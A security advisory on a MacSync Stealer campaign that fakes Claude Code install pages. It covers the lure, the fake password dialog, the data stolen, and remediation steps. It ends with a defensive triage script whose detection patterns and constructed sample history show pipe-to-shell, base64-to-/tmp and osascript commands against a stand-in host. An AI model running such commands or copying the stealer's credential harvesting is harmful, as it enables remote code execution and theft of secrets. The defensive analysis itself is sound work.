A fresh MacSync Stealer campaign is abusing developer interest in Claude Code through sponsored Google results and fake installation flows. Beelzebub Labs says the campaign impersonates Anthropic’s Claude Code CLI, sends victims to a Google Sites lure, and pushes a terminal command that delivers MacSync Stealer v1.1.2 with the campaign build tag claude1 [1].
The important twist is the user journey. The victim is not simply sent to a download page. The lure walks the user through copying a command into Terminal, primes them to expect an administrator password prompt, and then uses an AppleScript payload to display a fake System Preferences dialog. If the user types the Mac login password into that dialog, the stealer holds the same secret that protects the login Keychain, so it can decrypt stored credentials instead of merely copying a locked database. That reach into local secrets is what a plain browser-download scam never gets.
This fits a broader InstallFix/ClickFix pattern that has already targeted people searching for Claude Code and other AI tools. Bitdefender previously documented fake Claude Code install pages that used pasted terminal commands to deliver macOS stealers, showing that AI developer tooling is now a regular malvertising theme rather than a one-off lure [2].
Gridinsoft has seen the same trust-abuse pattern in related stories, including a fake Claude AI site pushing a Windows backdoor, a fake OpenAI Hugging Face repository delivering infostealer malware, and AI-themed Noodlophile Stealer campaigns. The platform changes, but the attacker workflow stays consistent: borrow a trusted AI brand, create a believable install moment, then turn the user’s own action into execution.
What Mac users should check after a fake install
Beelzebub’s analysis says MacSync targeted browser profiles, Firefox/Gecko data, more than 80 wallet extensions, more than 20 desktop wallets, macOS Keychains, iCloud Keychain local data, SSH keys, AWS credentials, Kubernetes configuration, Telegram Desktop sessions, Apple Notes data, shell history, and selected document/key files. It also described a second stage that replaces app.asar inside Ledger Live or Ledger Wallet to show a fake recovery flow and capture seed phrases [1].
That means the response should not stop at deleting a suspicious file. If a Claude Code install command was pasted into Terminal, check ~/.zsh_history, ~/.bash_history, recent Terminal sessions, login items and ~/Library/LaunchAgents, browser extension directories, ~/Library/Keychains/, ~/.ssh/, ~/.aws/, ~/.kube/, and any recently modified Ledger Live or wallet application files. Compare modification times in those paths against the moment the command was pasted; anything touched within minutes of it deserves a closer look. A fake error message after the command is not proof that installation failed; it may be the cover screen shown after theft.
The credential priority is clear. Rotate developer and cloud access first: GitHub tokens, SSH keys, AWS access keys, Kubernetes contexts, package registry tokens, password-manager sessions, browser sync sessions, and any credentials stored in browsers. Do the rotation from a device you trust rather than from the affected Mac, and revoke the old tokens and keys rather than only issuing new ones, since a stealer that already exported them does not need the Mac any more. For crypto wallets, move funds to wallets created on a clean device if a seed phrase, wallet extension, Ledger Live app, or recovery prompt was exposed. Reinstalling the wallet app is not enough if the seed phrase was typed into a fake recovery flow.
The prevention rule is also concrete: a sponsored search result should never be the source of an install command, and official developer tools should not require copying an opaque one-liner into Terminal. Use vendor documentation reached from a manually typed domain, download installer scripts to a file and read them before running them instead of piping them straight into a shell, avoid sponsored results for security-sensitive installs, and treat any macOS password dialog that appears immediately after a pasted install command as a compromise signal until proven otherwise.
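A small triage helper that covers both the post-install checks above (shell history, recently touched secret paths) and the inspect-before-run rule. It is an added example, not code from Beelzebub Labs, Gridinsoft or the campaign report; the grep patterns are generic "pasted installer" tells rather than a MacSync signature, the sample history is constructed, and the secret directories and the Ledger Live bundle path are assumptions about a typical Mac.

```sh
#!/bin/sh
# Added triage helper, not code from Beelzebub Labs, Gridinsoft or the campaign.
# Assumes zsh/bash history files and the secret paths named in the article; the
# patterns are generic "pasted installer" tells, not a MacSync signature.

# Things a legitimate developer-tool install rarely needs in one pasted line:
# curl piped straight into a shell, inline base64 decoding, osascript (the
# article's fake-dialog vector), quarantine stripping, or scripts dropped in /tmp.
SUSPICIOUS='curl[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)|osascript|base64[[:space:]]+(-d|--decode|-D)|xattr[[:space:]]+-d[[:space:]]+com\.apple\.quarantine|/tmp/[^[:space:]]*\.(sh|command)'

# scan_history FILE: print matching lines, with zsh's ": <epoch>:<elapsed>;" prefix removed.
# Works on a saved installer script too: run it on the file before you ever execute it.
scan_history() {
    grep -E -i "$SUSPICIOUS" "$1" 2>/dev/null | sed -E 's/^: [0-9]+:[0-9]+;//'
}

# count_hits FILE: number of suspicious lines, usable from scripts and checks.
count_hits() {
    scan_history "$1" | wc -l | tr -d ' '
}

# recent_secret_files DIR DAYS: files under DIR modified within the last DAYS days.
# Returns nothing (and succeeds) if DIR does not exist.
recent_secret_files() {
    [ -d "$1" ] || return 0
    find "$1" -type f -mtime "-$2" 2>/dev/null
}

# Stand-alone demo on a constructed history file (not real campaign data).
demo() {
    sample="$(mktemp)"
    cat >"$sample" <<'EOF'
: 1700000000:0;brew install node
: 1700000100:0;curl -fsSL https://installer.example/claude-code.sh | bash
: 1700000200:0;git status
: 1700000300:0;echo aGVsbG8= | base64 -d > /tmp/stage.sh
: 1700000400:0;osascript /tmp/prompt.scpt
EOF
    echo "suspicious history lines: $(count_hits "$sample")"   # 3
    scan_history "$sample"
    rm -f "$sample"

    # On a real Mac, widen DAYS to cover the time since the command was pasted.
    for d in "$HOME/.ssh" "$HOME/.aws" "$HOME/.kube" "$HOME/Library/Keychains" \
             "/Applications/Ledger Live.app"; do
        recent_secret_files "$d" 1
    done
}

if [ "${1:-}" = "--demo" ]; then
    demo
fi
```

Run it as `sh triage.sh --demo` on the affected Mac, then point `scan_history` at the real ~/.zsh_history and ~/.bash_history. A hit list from this script is a starting point for the timestamp comparison, not a verdict: a clean result does not clear the machine, because a stealer that ran once and exited leaves little behind besides what it touched.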
Related context: newer macOS stealer lures now include SHub Reaper fake login flows, where the handoff from a browser page to a local action is the main warning sign.